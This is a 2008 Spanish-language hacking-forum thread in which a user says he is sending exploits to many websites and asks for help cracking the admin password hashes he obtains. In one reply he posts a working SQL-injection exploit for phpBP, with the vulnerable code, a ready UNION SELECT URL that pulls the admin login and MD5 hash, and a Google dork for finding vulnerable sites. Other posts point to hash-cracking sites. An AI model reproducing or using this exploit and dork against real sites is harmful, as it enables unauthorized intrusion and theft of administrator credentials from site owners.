Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse. - Julio 05, 2008, 04:51:17
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Quien Me Ayuda con Los Hash? 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Quien Me Ayuda con Los Hash?  (Leído 86 veces)
LoRd_BeLiAL
Miembro
*****
Desconectado Desconectado

Mensajes: 49



Ver Perfil
« en: Marzo 17, 2008, 09:11:38 »
Hola, ando enviando exploit a to lo q da por el maravilloso mundo de el internet...muchas de esas paginas me esta dando los hash....Pero mi problema es q estas paginitas de crackiar hash no estan actualizadas  Angry


alguien q conosca una, buena buena buenaaaa q este actualizada??


o alguien me puede explicar la technica para yo mismo crackiar el hash?


muchas gracias al los q posteen  Wink
En línea
-ZeR0™-
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1029


HaCkIng & SeCuRiTy


Ver Perfil WWW
« Respuesta #1 en: Marzo 17, 2008, 09:22:09 »
Para poder crackear el hash tu mismo necesitarias mucho tiempo un PC o varios PC's,
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.milw0rm.com
   en esa paguina puedes crackear el hash Wink
En línea


Hardware Info

*S.O: MS Windows XP Professional SP2
*Procesador: AMD Duron
*Placa base:  PCChips M810LR

*Memoria RAM: SdRam (2 X 128Mb)
*Tarjeta Gráfica: SIS300/305/630/540/730

*Regrabador: LITE-ON   DVDRW SOHW-1673S   
*Disco Duro: Maxtor 6 E040L0
LoRd_BeLiAL
Miembro
*****
Desconectado Desconectado

Mensajes: 49



Ver Perfil
« Respuesta #2 en: Marzo 17, 2008, 09:25:41 »
la intente  Cry ya y nada, tengo una lista y ninguna me funciona
En línea
LoRd_BeLiAL
Miembro
*****
Desconectado Desconectado

Mensajes: 49



Ver Perfil
« Respuesta #3 en: Marzo 17, 2008, 09:34:47 »
Compartire ek exploit q ando usando q me funciona de maravilla.... De antemanos les dejo saber q es de Milworm

pero pues lo q no logro conseguir es quien me crackee el hash  Cry


Código:
.-----------------------------------------------------------------------------.
|  vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability        |
|  download: http://www.phpbp.com/                                            |
|  dork: "PHP BP Team"                                                        |
|                                                                             |
|  author: irk4z @yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|                        --->    HACKBOX.pl    <---                           |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

 ./includes/functions/banners-external.php:
 ...
3   function banner_out() //zlicza ilosc klikniec na banner
4   {
5    global $conf;
6
7    if($_GET['id'])
8    {
9     SQLvalidate($_POST['id']);
10
11    $db = new dbquery;
12    $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14    if($db->num_rows()==0)
15    {
16     redirect('index.php?module=error?error=banners_error2');
17     exit;
18    }
19
20    $d=$db->fetch_object();
21    $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);
22
23    redirect($d->url);
24   }
25
26   exit;
27  }
 ...

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)

# milw0rm.com [2008-03-16]


Facil de entender:

una vez pongas la inyeccion, si la pagina es vulnerable te llevara a la paginita q te dice server not found (pagina no encontrada) pero te dira el nombre de el admin seguido por el hash de esta manera:

Código:
admin_9649dd00518a257d5568509e5398014


bueno suerte!



PD: Para buscar las paginas vulnerables, En el Buscador de Google ponen: "PHP BP Team" (con las Comillas)

 Wink
En línea
S3b4
Recien Llegado
*
Conectado Conectado

Mensajes: 12


Firefox por siempre

seba-842@hotmail.com
Ver Perfil WWW Email
« Respuesta #4 en: Marzo 26, 2008, 02:46:57 »
quizás usan un sistema de encriptación hecha por ellos mismos (phpbp), busca que sistema usan y el respectivo crackeador.
« Última modificación: Marzo 26, 2008, 02:49:00 por S3b4 » En línea




Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Quien Me Ayuda con Los Hash? « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC